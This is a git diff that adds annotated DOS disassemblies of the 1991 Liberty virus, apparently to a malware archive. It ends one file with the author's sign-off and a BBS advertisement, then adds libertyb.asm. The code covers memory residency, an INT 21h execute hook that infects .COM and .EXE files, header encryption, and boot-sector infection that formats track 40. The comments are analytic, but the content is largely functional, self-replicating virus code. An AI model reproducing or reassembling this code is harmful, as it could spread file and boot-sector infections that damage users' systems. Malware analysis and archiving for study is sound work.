+CS:0BE4 8A00 MOV AL,[BX+SI]
+CS:0BE6 2E CS:
+CS:0BE7 FE06960B INC BYTE PTR [0B96]
+CS:0BEB 2E CS:
+CS:0BEC 803E960B07 CMP BYTE PTR [0B96],07
+CS:0BF1 7506 JNZ 0BF9
+CS:0BF3 2E CS:
+CS:0BF4 C606960B00 MOV BYTE PTR [0B96],00
+CS:0BF9 5E POP SI
+CS:0BFA 5B POP BX
+CS:0BFB CF IRET
+CS:0BFC 9C PUSHF ; Printer
+CS:0BFD 80FC00 CMP AH,00
+CS:0C00 7407 JZ 0C09
+CS:0C02 9D POPF
+CS:0C03 EA00000000 JMP 0000:0000
+CS:0C09 2E CS:
+CS:0C0A 803E080CFF CMP BYTE PTR [0C08],FF
+CS:0C0F 74F1 JZ 0C02
+CS:0C11 53 PUSH BX
+CS:0C12 56 PUSH SI
+CS:0C13 33DB XOR BX,BX
+CS:0C15 2E CS:
+CS:0C16 8A1E3A0C MOV BL,[0C3A]
+CS:0C1A BE3B0C MOV SI,0C3B
+CS:0C1D 2E CS:
+CS:0C1E 8A00 MOV AL,[BX+SI]
+CS:0C20 FEC0 INC AL
+CS:0C22 2E CS:
+CS:0C23 FE063A0C INC BYTE PTR [0C3A]
+CS:0C27 2E CS:
+CS:0C28 803E3A0C07 CMP BYTE PTR [0C3A],07
+CS:0C2D 7507 JNZ 0C36
+CS:0C2F 2E CS:
+CS:0C30 C6063A0C00 MOV BYTE PTR [0C3A],00
+CS:0C35 90 NOP
+CS:0C36 5E POP SI
+CS:0C37 5B POP BX
+CS:0C38 EBC8 JMP 0C02
+;
+; The encrypted text 'MAGIC!!'
+;
+DS:0C3A 4C 40 46 48 42 20 20
+;
+; Important note:
+; When there is no longer space on the disk to infect a file, the Liberty
+; virus will infect the bootsector. This is done in the 'OHIO' way.
+;
+;
+;
+; End of Liberty (2867) disassembly. (c) 1991 by Remco van Helvoort.
+; This document may be freely shared. If you have any comments or some
+; nice little viruses for analysis, feel free to drop me a note.
+;
+; Remco van Helvoort
+; Bredastraat 3
+; 5224 VD 's-Hertogenbosch
+; Holland
+;
+
+; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
+; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.libertyb.asm b/MSDOS/Virus.MSDOS.Unknown.libertyb.asm
new file mode 100644
index 00000000..ad39d293
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.libertyb.asm
@@ -0,0 +1,1194 @@
+CS:0110 EB79 JMP 018B
+CS:0112 90 NOP
+;
+; The program's original infomation is stored between these sections
+;
+CS:018B 2E CS:
+CS:018C 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ?
+CS:0191 7403 JZ 0196
+CS:0193 1F POP DS
+CS:0194 59 POP CX
+CS:0195 5B POP BX
+CS:0196 50 PUSH AX
+CS:0197 53 PUSH BX
+CS:0198 51 PUSH CX
+CS:0199 52 PUSH DX
+CS:019A 1E PUSH DS
+CS:019B 06 PUSH ES
+CS:019C 1E PUSH DS
+CS:019D 0E PUSH CS
+CS:019E 1F POP DS
+CS:019F E8CD00 CALL 026F ; Installation check
+CS:01A2 3DFFFF CMP AX,FFFF
+CS:01A5 741A JZ 01C1
+CS:01A7 E8D700 CALL 0281 ; Get vector 21h
+CS:01AA 07 POP ES
+CS:01AB 06 PUSH ES
+CS:01AC 8CC0 MOV AX,ES
+CS:01AE 48 DEC AX
+CS:01AF 8ED8 MOV DS,AX
+CS:01B1 E8DC00 CALL 0290 ; Adjust MCB
+CS:01B4 8EC0 MOV ES,AX
+CS:01B6 0E PUSH CS
+CS:01B7 1F POP DS
+CS:01B8 E8EC00 CALL 02A7 ; Move to Upper Memory
+CS:01BB E8F400 CALL 02B2 ; Set vector 21h
+CS:01BE E80101 CALL 02C2 ; Set installation flag
+CS:01C1 2E CS:
+CS:01C2 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ?
+CS:01C7 7417 JZ 01E0
+CS:01C9 07 POP ES
+CS:01CA 0E PUSH CS
+CS:01CB 1F POP DS
+CS:01CC E80901 CALL 02D8 ; Decrypt header
+CS:01CF E81901 CALL 02EB ; Restore header
+CS:01D2 07 POP ES
+CS:01D3 1F POP DS
+CS:01D4 5A POP DX
+CS:01D5 59 POP CX
+CS:01D6 5B POP BX
+CS:01D7 58 POP AX
+CS:01D8 1E PUSH DS
+CS:01D9 BF0001 MOV DI,0100
+CS:01DC 57 PUSH DI
+CS:01DD 33FF XOR DI,DI
+CS:01DF CB RETF ; Start file
+CS:01E0 FA CLI
+CS:01E1 5E POP SI
+CS:01E2 07 POP ES
+CS:01E3 1F POP DS
+CS:01E4 5A POP DX
+CS:01E5 59 POP CX
+CS:01E6 5B POP BX
+CS:01E7 58 POP AX
+CS:01E8 2E CS:
+CS:01E9 8B3E2C06 MOV DI,[062C]
+CS:01ED 03FE ADD DI,SI
+CS:01EF 8ED7 MOV SS,DI
+CS:01F1 2E CS:
+CS:01F2 8B3E2E06 MOV DI,[062E]
+CS:01F6 8BE7 MOV SP,DI ; Restore stack
+CS:01F8 2E CS:
+CS:01F9 8B3E2806 MOV DI,[0628]
+CS:01FD 03FE ADD DI,SI
+CS:01FF 57 PUSH DI
+CS:0200 2E CS:
+CS:0201 FF362A06 PUSH [062A]
+CS:0205 33F6 XOR SI,SI
+CS:0207 EBD4 JMP 01DD ; Start file
+;
+; The encrypted Liberty header for .COM files
+;
+DS:0200 1D 69 D9 00 01 01
+DS:0210 80 80 40 40 20 20 10 10-08 08 A4 05 D2 04 C9 02
+DS:0220 4C 81 A8 40 49 20 21 90-0B 48 E8 69 95 05 4A 92
+DS:0230 21 1D 40 A8 43 28 90 14-4E 4C 07 27 D3 22 81 81
+DS:0240 C0 B0 40 C4 79 20 90 29-5C D0 AE 69 57 35 2B 9A
+DS:0250 31 CD 34 40 51 53 AE 5D-62 C0 E3 C1 B0 35 58 F6
+DS:0260 46 E5 20 02
+;
+; Various subroutines used by the virus
+;
+CS:026F 2E CS:
+CS:0270 8A1E6A02 MOV BL,[026A]
+CS:0274 32FF XOR BH,BH
+CS:0276 33C0 XOR AX,AX
+CS:0278 8ED8 MOV DS,AX
+CS:027A D1E3 SHL BX,1
+CS:027C D1E3 SHL BX,1
+CS:027E 8B07 MOV AX,[BX]
+CS:0280 C3 RET
+CS:0281 A18400 MOV AX,[0084]
+CS:0284 2E CS:
+CS:0285 A38C03 MOV [038C],AX
+CS:0288 A18600 MOV AX,[0086]
+CS:028B 2E CS:
+CS:028C A38E03 MOV [038E],AX
+CS:028F C3 RET
+CS:0290 BB4221 MOV BX,2142
+CS:0293 B104 MOV CL,04
+CS:0295 D3EB SHR BX,CL
+CS:0297 291E0300 SUB [0003],BX
+CS:029B A10300 MOV AX,[0003]
+CS:029E 03060100 ADD AX,[0001]
+CS:02A2 A31200 MOV [0012],AX
+CS:02A5 40 INC AX
+CS:02A6 C3 RET
+CS:02A7 BF1001 MOV DI,0110
+CS:02AA 8BF7 MOV SI,DI
+CS:02AC B99A05 MOV CX,059A
+CS:02AF F3 REPZ
+CS:02B0 A5 MOVSW
+CS:02B1 C3 RET
+CS:02B2 33C0 XOR AX,AX
+CS:02B4 8ED8 MOV DS,AX
+CS:02B6 FA CLI
+CS:02B7 B86C03 MOV AX,036C
+CS:02BA A38400 MOV [0084],AX
+CS:02BD 8C068600 MOV [0086],ES
+CS:02C1 C3 RET
+CS:02C2 FA CLI
+CS:02C3 B8FFFF MOV AX,FFFF
+CS:02C6 2E CS:
+CS:02C7 8A1E6A02 MOV BL,[026A]
+CS:02CB 32FF XOR BH,BH
+CS:02CD D1E3 SHL BX,1
+CS:02CF D1E3 SHL BX,1
+CS:02D1 8907 MOV [BX],AX
+CS:02D3 40 INC AX
+CS:02D4 894702 MOV [BX+02],AX
+CS:02D7 C3 RET
+CS:02D8 B93C00 MOV CX,003C
+CS:02DB BE1301 MOV SI,0113
+CS:02DE 2E CS:
+CS:02DF 8B14 MOV DX,[SI]
+CS:02E1 D3CA ROR DX,CL
+CS:02E3 2E CS:
+CS:02E4 8914 MOV [SI],DX
+CS:02E6 46 INC SI
+CS:02E7 46 INC SI
+CS:02E8 E2F4 LOOP 02DE
+CS:02EA C3 RET
+CS:02EB BF0001 MOV DI,0100
+CS:02EE BE1301 MOV SI,0113
+CS:02F1 B93C00 MOV CX,003C
+CS:02F4 F3 REPZ
+CS:02F5 A5 MOVSW
+CS:02F6 C3 RET
+;
+; I am not sure what the next routine is supposed to be doing.
+;
+CS:02F7 9C PUSHF
+CS:02F8 2E CS:
+CS:02F9 803E100301 CMP BYTE PTR [0310],01
+CS:02FE 740A JZ 030A
+CS:0300 80FC03 CMP AH,03
+CS:0303 7505 JNZ 030A
+CS:0305 80FA80 CMP DL,80
+CS:0308 7207 JB 0311
+CS:030A 9D POPF
+CS:030B EA00000000 JMP 0000:0000
+CS:0311 06 PUSH ES
+CS:0312 0E PUSH CS
+CS:0313 07 POP ES
+CS:0314 B80902 MOV AX,0209
+CS:0317 BB420C MOV BX,0C42
+CS:031A B90100 MOV CX,0001
+CS:031D 9C PUSHF
+CS:031E 2E CS:
+CS:031F FF1E0C03 CALL FAR [030C]
+CS:0323 72E5 JB 030A
+CS:0325 B80905 MOV AX,0509
+CS:0328 BB4803 MOV BX,0348
+CS:032B B93100 MOV CX,0031
+CS:032E 9C PUSHF
+CS:032F 2E CS:
+CS:0330 FF1E0C03 CALL FAR [030C]
+CS:0334 72D4 JB 030A
+CS:0336 B80903 MOV AX,0309
+CS:0339 BB420C MOV BX,0C42
+CS:033C B93100 MOV CX,0031
+CS:033F 9C PUSHF
+CS:0340 2E CS:
+CS:0341 FF1E0C03 CALL FAR [030C]
+CS:0345 07 POP ES
+CS:0346 9D POPF
+CS:0347 CF IRET
+;
+; Another format table used by the virus
+;
+DS:0340 00 00 31 02 00 00 32 02
+DS:0350 00 00 33 02 00 00 34 02-00 00 35 02 00 00 36 02
+DS:0360 37 02 00 00 38 02-00 00 39 02
+;
+; The virus infects files by monitoring function 4Bh of vector 21h
+;
+CS:036C 9C PUSHF
+CS:036D 3D004B CMP AX,4B00 ; Execute function ?
+CS:0370 741E JZ 0390
+CS:0372 EB16 JMP 038A
+CS:0374 90 NOP
+CS:0375 E8B901 CALL 0531 ; Close file
+CS:0378 E89A00 CALL 0415 ; Restore vectors
+CS:037B C6060C04FF MOV BYTE PTR [040C],FF
+CS:0380 90 NOP
+CS:0381 9D POPF
+CS:0382 07 POP ES
+CS:0383 1F POP DS
+CS:0384 5F POP DI
+CS:0385 5E POP SI
+CS:0386 5A POP DX
+CS:0387 59 POP CX
+CS:0388 5B POP BX
+CS:0389 58 POP AX
+CS:038A 9D POPF
+CS:038B EA77142C02 JMP 022C:1477 ; Continue
+CS:0390 50 PUSH AX
+CS:0391 53 PUSH BX
+CS:0392 51 PUSH CX
+CS:0393 52 PUSH DX
+CS:0394 56 PUSH SI
+CS:0395 57 PUSH DI
+CS:0396 1E PUSH DS
+CS:0397 06 PUSH ES
+CS:0398 9C PUSHF
+CS:0399 E8A600 CALL 0442 ; Set error vectors
+CS:039C E8E100 CALL 0480 ; Open file
+CS:039F 72D4 JB 0375
+CS:03A1 0E PUSH CS
+CS:03A2 1F POP DS
+CS:03A3 0E PUSH CS
+CS:03A4 07 POP ES
+CS:03A5 A30A04 MOV [040A],AX
+CS:03A8 93 XCHG BX,AX
+CS:03A9 C6060C0401 MOV BYTE PTR [040C],01
+CS:03AE 90 NOP
+CS:03AF E8D800 CALL 048A ; Read file header
+CS:03B2 72C1 JB 0375
+CS:03B4 BB1301 MOV BX,0113
+CS:03B7 2E CS:
+CS:03B8 813F4D5A CMP WORD PTR [BX],5A4D ; .EXE file ?
+CS:03BC 7505 JNZ 03C3
+CS:03BE E8C001 CALL 0581 ; Adapt header
+CS:03C1 EBB2 JMP 0375
+CS:03C3 2E CS:
+CS:03C4 C606090200 MOV BYTE PTR [0209],00 ; Set switch
+CS:03C9 E8CD00 CALL 0499 ; Check infection
+CS:03CC 74A7 JZ 0375
+CS:03CE E8DD00 CALL 04AE ; Encrypt header
+CS:03D1 E8EB00 CALL 04BF ; Move to EOF
+CS:03D4 729F JB 0375
+CS:03D6 83FA00 CMP DX,+00 ;
+CS:03D9 759A JNZ 0375 ;
+CS:03DB 3D0005 CMP AX,0500 ;
+CS:03DE 7295 JB 0375 ;
+CS:03E0 3DFFEF CMP AX,EFFF ;
+CS:03E3 7390 JNB 0375 ; Check file size
+CS:03E5 E8EA00 CALL 04D2 ; Move to next paragraph
+CS:03E8 728B JB 0375
+CS:03EA E80701 CALL 04F4 ; Write virus
+CS:03ED 7286 JB 0375
+CS:03EF 3BC1 CMP AX,CX
+CS:03F1 7C11 JL 0404
+CS:03F3 E81301 CALL 0509 ; Move to BOF
+CS:03F6 7209 JB 0401
+CS:03F8 E86201 CALL 055D ; Decrypt Libery header
+CS:03FB E81E01 CALL 051C ; Write Liberty header
+CS:03FE E86F01 CALL 0570 ; Encrypt Liberty Header
+CS:0401 E971FF JMP 0375
+CS:0404 E83801 CALL 053F ; Set & get vector 13h
+CS:0407 E96BFF JMP 0375
+;
+; Revectoring of error vectors.
+;
+CS:0415 1E PUSH DS
+CS:0416 33DB XOR BX,BX
+CS:0418 8EDB MOV DS,BX
+CS:041A FA CLI
+CS:041B 2E CS:
+CS:041C 8B1E0D04 MOV BX,[040D]
+CS:0420 891E8C00 MOV [008C],BX
+CS:0424 2E CS:
+CS:0425 8B1E0F04 MOV BX,[040F]
+CS:0429 891E8E00 MOV [008E],BX
+CS:042D FA CLI
+CS:042E 2E CS:
+CS:042F 8B1E1104 MOV BX,[0411]
+CS:0433 891E9000 MOV [0090],BX
+CS:0437 2E CS:
+CS:0438 8B1E1304 MOV BX,[0413]
+CS:043C 891E8E00 MOV [008E],BX
+CS:0440 1F POP DS
+CS:0441 C3 RET
+CS:0442 1E PUSH DS
+CS:0443 33DB XOR BX,BX
+CS:0445 8EDB MOV DS,BX
+CS:0447 8B1E8C00 MOV BX,[008C]
+CS:044B 2E CS:
+CS:044C 891E0D04 MOV [040D],BX
+CS:0450 8B1E8E00 MOV BX,[008E]
+CS:0454 2E CS:
+CS:0455 891E0F04 MOV [040F],BX
+CS:0459 FA CLI
+CS:045A BB3106 MOV BX,0631
+CS:045D 891E8C00 MOV [008C],BX
+CS:0461 8C0E8E00 MOV [008E],CS
+CS:0465 8B1E9000 MOV BX,[0090]
+CS:0469 2E CS:
+CS:046A 891E1104 MOV [0411],BX
+CS:046E 8B1E9200 MOV BX,[0092]
+CS:0472 FA CLI
+CS:0473 BB3206 MOV BX,0632
+CS:0476 891E9000 MOV [0090],BX
+CS:047A 8C0E9200 MOV [0092],CS
+CS:047E 1F POP DS
+CS:047F C3 RET
+;
+; Various subroutines used by the virus
+;
+CS:0480 B8023D MOV AX,3D02
+CS:0483 9C PUSHF
+CS:0484 2E CS:
+CS:0485 FF1E8C03 CALL FAR [038C]
+CS:0489 C3 RET
+CS:048A B43F MOV AH,3F
+CS:048C B97800 MOV CX,0078
+CS:048F BA1301 MOV DX,0113
+CS:0492 9C PUSHF
+CS:0493 2E CS:
+CS:0494 FF1E8C03 CALL FAR [038C]
+CS:0498 C3 RET
+CS:0499 BF1301 MOV DI,0113
+CS:049C 81C76802 ADD DI,0268
+CS:04A0 81EF0A02 SUB DI,020A
+CS:04A4 BE6802 MOV SI,0268
+CS:04A7 FC CLD
+CS:04A8 B90700 MOV CX,0007
+CS:04AB F3 REPZ
+CS:04AC A6 CMPSB
+CS:04AD C3 RET
+CS:04AE B93C00 MOV CX,003C
+CS:04B1 BE1301 MOV SI,0113
+CS:04B4 8B14 MOV DX,[SI]
+CS:04B6 D3C2 ROL DX,CL
+CS:04B8 8914 MOV [SI],DX
+CS:04BA 46 INC SI
+CS:04BB 46 INC SI
+CS:04BC E2F6 LOOP 04B4
+CS:04BE C3 RET
+CS:04BF B80242 MOV AX,4202
+CS:04C2 2E CS:
+CS:04C3 8B1E0A04 MOV BX,[040A]
+CS:04C7 33C9 XOR CX,CX
+CS:04C9 33D2 XOR DX,DX
+CS:04CB 9C PUSHF
+CS:04CC 2E CS:
+CS:04CD FF1E8C03 CALL FAR [038C]
+CS:04D1 C3 RET
+CS:04D2 B90400 MOV CX,0004
+CS:04D5 D3E8 SHR AX,CL
+CS:04D7 BB6602 MOV BX,0266
+CS:04DA 8907 MOV [BX],AX
+CS:04DC 40 INC AX
+CS:04DD B90400 MOV CX,0004
+CS:04E0 D3E0 SHL AX,CL
+CS:04E2 92 XCHG DX,AX
+CS:04E3 33C9 XOR CX,CX
+CS:04E5 B80042 MOV AX,4200
+CS:04E8 2E CS:
+CS:04E9 8B1E0A04 MOV BX,[040A]
+CS:04ED 9C PUSHF
+CS:04EE 2E CS:
+CS:04EF FF1E8C03 CALL FAR [038C]
+CS:04F3 C3 RET
+CS:04F4 B9330B MOV CX,0B33
+CS:04F7 B80040 MOV AX,4000
+CS:04FA BA1001 MOV DX,0110
+CS:04FD 2E CS:
+CS:04FE 8B1E0A04 MOV BX,[040A]
+CS:0502 9C PUSHF
+CS:0503 2E CS:
+CS:0504 FF1E8C03 CALL FAR [038C]
+CS:0508 C3 RET
+CS:0509 B80042 MOV AX,4200
+CS:050C 2E CS:
+CS:050D 8B1E0A04 MOV BX,[040A]
+CS:0511 33C9 XOR CX,CX
+CS:0513 33D2 XOR DX,DX
+CS:0515 9C PUSHF
+CS:0516 2E CS:
+CS:0517 FF1E8C03 CALL FAR [038C]
+CS:051B C3 RET
+CS:051C BA0A02 MOV DX,020A
+CS:051F B80040 MOV AX,4000
+CS:0522 2E CS:
+CS:0523 8B1E0A04 MOV BX,[040A]
+CS:0527 B97800 MOV CX,0078
+CS:052A 9C PUSHF
+CS:052B 2E CS:
+CS:052C FF1E8C03 CALL FAR [038C]
+CS:0530 C3 RET
+CS:0531 B43E MOV AH,3E
+CS:0533 2E CS:
+CS:0534 8B1E0A04 MOV BX,[040A]
+CS:0538 9C PUSHF
+CS:0539 2E CS:
+CS:053A FF1E8C03 CALL FAR [038C]
+CS:053E C3 RET
+CS:053F 33C0 XOR AX,AX
+CS:0541 8ED8 MOV DS,AX
+CS:0543 FA CLI
+CS:0544 A14C00 MOV AX,[004C]
+CS:0547 2E CS:
+CS:0548 A31407 MOV [0714],AX
+CS:054B A14E00 MOV AX,[004E]
+CS:054E 2E CS:
+CS:054F A31607 MOV [0716],AX
+CS:0552 B8F906 MOV AX,06F9
+CS:0555 A34C00 MOV [004C],AX
+CS:0558 8C0E4E00 MOV [004E],CS
+CS:055C C3 RET
+;
+; Header encrypting
+;
+CS:055D B92D00 MOV CX,002D
+CS:0560 BE0A02 MOV SI,020A
+CS:0563 2E CS:
+CS:0564 8B3C MOV DI,[SI]
+CS:0566 D3CF ROR DI,CL
+CS:0568 2E CS:
+CS:0569 893C MOV [SI],DI
+CS:056B 46 INC SI
+CS:056C 46 INC SI
+CS:056D E2F4 LOOP 0563
+CS:056F C3 RET
+CS:0570 BE0A02 MOV SI,020A
+CS:0573 B92D00 MOV CX,002D
+CS:0576 8B3C MOV DI,[SI]
+CS:0578 D3C7 ROL DI,CL
+CS:057A 893C MOV [SI],DI
+CS:057C 46 INC SI
+CS:057D 46 INC SI
+CS:057E E2F6 LOOP 0576
+CS:0580 C3 RET
+;
+; .EXE file handling
+;
+CS:0581 8B7F02 MOV DI,[BX+02]
+CS:0584 83FFFF CMP DI,-01 ; Check infection
+CS:0587 7439 JZ 05C2
+CS:0589 8B7F16 MOV DI,[BX+16]
+CS:058C 83C710 ADD DI,+10
+CS:058F 893E2806 MOV [0628],DI
+CS:0593 8B7F14 MOV DI,[BX+14]
+CS:0596 893E2A06 MOV [062A],DI
+CS:059A 8B7F0E MOV DI,[BX+0E]
+CS:059D 83C710 ADD DI,+10
+CS:05A0 893E2C06 MOV [062C],DI
+CS:05A4 8B7F10 MOV DI,[BX+10]
+CS:05A7 893E2E06 MOV [062E],DI
+CS:05AB BF1001 MOV DI,0110
+CS:05AE 897F14 MOV [BX+14],DI ; Set IP
+CS:05B1 BF420D MOV DI,0D42
+CS:05B4 897F10 MOV [BX+10],DI ; Set SP
+CS:05B7 2E CS:
+CS:05B8 C606090201 MOV BYTE PTR [0209],01 ; Set switch
+CS:05BD E8FFFE CALL 04BF ; Move to EOF
+CS:05C0 7301 JNB 05C3
+CS:05C2 C3 RET
+CS:05C3 83FA0A CMP DX,+0A ;
+CS:05C6 77FA JA 05C2 ; Check file size
+CS:05C8 B104 MOV CL,04
+CS:05CA D3E8 SHR AX,CL
+CS:05CC 40 INC AX
+CS:05CD 3D0010 CMP AX,1000
+CS:05D0 7501 JNZ 05D3
+CS:05D2 42 INC DX
+CS:05D3 D3E0 SHL AX,CL
+CS:05D5 50 PUSH AX
+CS:05D6 52 PUSH DX
+CS:05D7 B91000 MOV CX,0010
+CS:05DA F7F1 DIV CX
+CS:05DC BB1301 MOV BX,0113
+CS:05DF 2D1100 SUB AX,0011
+CS:05E2 8B7F08 MOV DI,[BX+08]
+CS:05E5 2BC7 SUB AX,DI
+CS:05E7 894716 MOV [BX+16],AX ; Set CodeSegment
+CS:05EA 89470E MOV [BX+0E],AX ; Set StackSegment
+CS:05ED 59 POP CX
+CS:05EE 5A POP DX
+CS:05EF E8F3FE CALL 04E5 ; Move to next paragraph
+CS:05F2 722F JB 0623
+CS:05F4 E8FDFE CALL 04F4 ; Write virus
+CS:05F7 722A JB 0623
+CS:05F9 3BC1 CMP AX,CX
+CS:05FB 7C27 JL 0624
+CS:05FD E8BFFE CALL 04BF ; Move to BOF
+CS:0600 7221 JB 0623
+CS:0602 B90002 MOV CX,0200
+CS:0605 F7F1 DIV CX
+CS:0607 83FA00 CMP DX,+00
+CS:060A 7401 JZ 060D
+CS:060C 40 INC AX
+CS:060D BB1301 MOV BX,0113
+CS:0610 894704 MOV [BX+04],AX ; Set blocks
+CS:0613 C74702FFFF MOV WORD PTR [BX+02],FFFF ; Set infection mark
+CS:0618 E8EEFE CALL 0509 ; Move to BOF
+CS:061B 7206 JB 0623
+CS:061D BA1301 MOV DX,0113
+CS:0620 E8FCFE CALL 051F ; Write header
+CS:0623 C3 RET
+CS:0624 E818FF CALL 053F ; Set & get vector 13h
+CS:0627 C3 RET
+;
+; Error vectors
+;
+CS:0631 CF IRET ; Error vector 23h
+CS:0632 32C0 XOR AL,AL ;
+CS:0634 CF IRET ; Error vector 24h
+;
+; The next part is the virus's bootsector
+;
+CS:0635 EB01 JMP 0638
+CS:0637 90 NOP
+CS:0638 33C0 XOR AX,AX
+CS:063A 8ED0 MOV SS,AX
+CS:063C BC007C MOV SP,7C00
+CS:063F 33C0 XOR AX,AX
+CS:0641 8EC0 MOV ES,AX
+CS:0643 BB1304 MOV BX,0413 ;
+CS:0646 26 ES: ;
+CS:0647 8B07 MOV AX,[BX] ;
+CS:0649 2D0A00 SUB AX,000A ;
+CS:064C B106 MOV CL,06 ;
+CS:064E 26 ES: ;
+CS:064F 8907 MOV [BX],AX ; Decrease memory
+CS:0651 D3E0 SHL AX,CL
+CS:0653 8EC0 MOV ES,AX
+CS:0655 B80802 MOV AX,0208 ;
+CS:0658 BB1001 MOV BX,0110 ;
+CS:065B B93128 MOV CX,2831 ;
+CS:065E 33D2 XOR DX,DX ;
+CS:0660 CD13 INT 13 ; Read virus
+CS:0662 06 PUSH ES
+CS:0663 BB6806 MOV BX,0668
+CS:0666 53 PUSH BX
+CS:0667 CB RETF
+CS:0668 2E CS:
+CS:0669 803EC8060A CMP BYTE PTR [06C8],0A
+CS:066E 7446 JZ 06B6
+CS:0670 33C0 XOR AX,AX
+CS:0672 8ED8 MOV DS,AX
+CS:0674 2E CS:
+CS:0675 FE06C806 INC BYTE PTR [06C8]
+CS:0679 B80803 MOV AX,0308
+CS:067C BB1001 MOV BX,0110
+CS:067F B93128 MOV CX,2831
+CS:0682 33D2 XOR DX,DX
+CS:0684 CD13 INT 13
+CS:0686 E85200 CALL 06DB ; Set & get vector 13h
+CS:0689 2E CS: ;
+CS:068A C606470BFF MOV BYTE PTR [0B47],FF ;
+CS:068F 90 NOP ;
+CS:0690 2E CS: ;
+CS:0691 C606950BFF MOV BYTE PTR [0B95],FF ;
+CS:0696 90 NOP ;
+CS:0697 2E CS: ;
+CS:0698 C606080CFF MOV BYTE PTR [0C08],FF ; Switches off
+CS:069D 90 NOP
+CS:069E E82902 CALL 08CA ; Set & get vector 8h
+CS:06A1 E85402 CALL 08F8 ; Set & get vector 1Ch
+CS:06A4 E84104 CALL 0AE8 ; Set & get vector 10h
+CS:06A7 E85804 CALL 0B02 ; Set & get vector 14h
+CS:06AA E86F04 CALL 0B1C ; Set & get vector 17h
+CS:06AD E81900 CALL 06C9 ; Read original bootsector
+CS:06B0 BB007C MOV BX,7C00 ;
+CS:06B3 1E PUSH DS ;
+CS:06B4 53 PUSH BX ;
+CS:06B5 CB RETF ; Start
+CS:06B6 E81000 CALL 06C9 ; Read bootsector
+CS:06B9 B80103 MOV AX,0301
+CS:06BC BB007C MOV BX,7C00
+CS:06BF B90100 MOV CX,0001
+CS:06C2 33D2 XOR DX,DX
+CS:06C4 CD13 INT 13
+CS:06C6 EBE5 JMP 06AD
+CS:06C9 33C0 XOR AX,AX
+CS:06CB 8EC0 MOV ES,AX
+CS:06CD B80102 MOV AX,0201
+CS:06D0 BB007C MOV BX,7C00
+CS:06D3 B93F28 MOV CX,283F
+CS:06D6 33D2 XOR DX,DX
+CS:06D8 CD13 INT 13
+CS:06DA C3 RET
+CS:06DB 33C0 XOR AX,AX
+CS:06DD 8ED8 MOV DS,AX
+CS:06DF A14C00 MOV AX,[004C]
+CS:06E2 2E CS:
+CS:06E3 A31608 MOV [0816],AX
+CS:06E6 A14E00 MOV AX,[004E]
+CS:06E9 2E CS:
+CS:06EA A31808 MOV [0818],AX
+CS:06ED FA CLI
+CS:06EE B8FB07 MOV AX,07FB
+CS:06F1 A34C00 MOV [004C],AX
+CS:06F4 8C0E4E00 MOV [004E],CS
+CS:06F8 C3 RET
+;
+; Boot sectors are infected via vector 13h
+;
+CS:06F9 9C PUSHF
+CS:06FA 80FC01 CMP AH,01
+CS:06FD 7E13 JLE 0712
+CS:06FF 80FC04 CMP AH,04
+CS:0702 7D0E JGE 0712
+CS:0704 80FA80 CMP DL,80
+CS:0707 720F JB 0718
+CS:0709 E8BE00 CALL 07CA ; Disconnect vector 13h
+CS:070C 07 POP ES
+CS:070D 1F POP DS
+CS:070E 5A POP DX
+CS:070F 59 POP CX
+CS:0710 5B POP BX
+CS:0711 58 POP AX
+CS:0712 9D POPF
+CS:0713 EA00000000 JMP 0000:0000
+CS:0718 50 PUSH AX
+CS:0719 53 PUSH BX
+CS:071A 51 PUSH CX
+CS:071B 52 PUSH DX
+CS:071C 1E PUSH DS
+CS:071D 06 PUSH ES
+CS:071E B80102 MOV AX,0201 ;
+CS:0721 0E PUSH CS ;
+CS:0722 07 POP ES ;
+CS:0723 0E PUSH CS ;
+CS:0724 1F POP DS ;
+CS:0725 BB420C MOV BX,0C42 ;
+CS:0728 B90100 MOV CX,0001 ;
+CS:072B 32F6 XOR DH,DH ;
+CS:072D 9C PUSHF ;
+CS:072E 2E CS: ;
+CS:072F FF1E1407 CALL FAR [0714] ; Read Bootsector
+CS:0733 72D4 JB 0709
+CS:0735 0E PUSH CS
+CS:0736 1F POP DS
+CS:0737 0E PUSH CS
+CS:0738 07 POP ES
+CS:0739 BE420C MOV SI,0C42 ;
+CS:073C BF3506 MOV DI,0635 ;
+CS:073F B90A00 MOV CX,000A ;
+CS:0742 FC CLD ;
+CS:0743 F3 REPZ ;
+CS:0744 A7 CMPSW ; Check infection
+CS:0745 74C2 JZ 0709
+CS:0747 BE420C MOV SI,0C42
+CS:074A 807C02FF CMP BYTE PTR [SI+02],FF ; Was infected ?
+CS:074E 744A JZ 079A
+CS:0750 B0FF MOV AL,FF
+CS:0752 884402 MOV [SI+02],AL
+CS:0755 B80905 MOV AX,0509 ;
+CS:0758 BBA607 MOV BX,07A6 ;
+CS:075B B93128 MOV CX,2831 ;
+CS:075E 9C PUSHF ;
+CS:075F 2E CS: ;
+CS:0760 FF1E1407 CALL FAR [0714] ; Format track 40
+CS:0764 72A3 JB 0709
+CS:0766 B80103 MOV AX,0301 ;
+CS:0769 BB420C MOV BX,0C42 ;
+CS:076C B93F28 MOV CX,283F ;
+CS:076F 9C PUSHF ;
+CS:0770 2E CS: ;
+CS:0771 FF1E1407 CALL FAR [0714] ; Write original bootsector
+CS:0775 7292 JB 0709
+CS:0777 B80103 MOV AX,0301 ;
+CS:077A BB3506 MOV BX,0635 ;
+CS:077D B90100 MOV CX,0001 ;
+CS:0780 9C PUSHF ;
+CS:0781 2E CS: ;
+CS:0782 FF1E1407 CALL FAR [0714] ; Write Libery bootsector
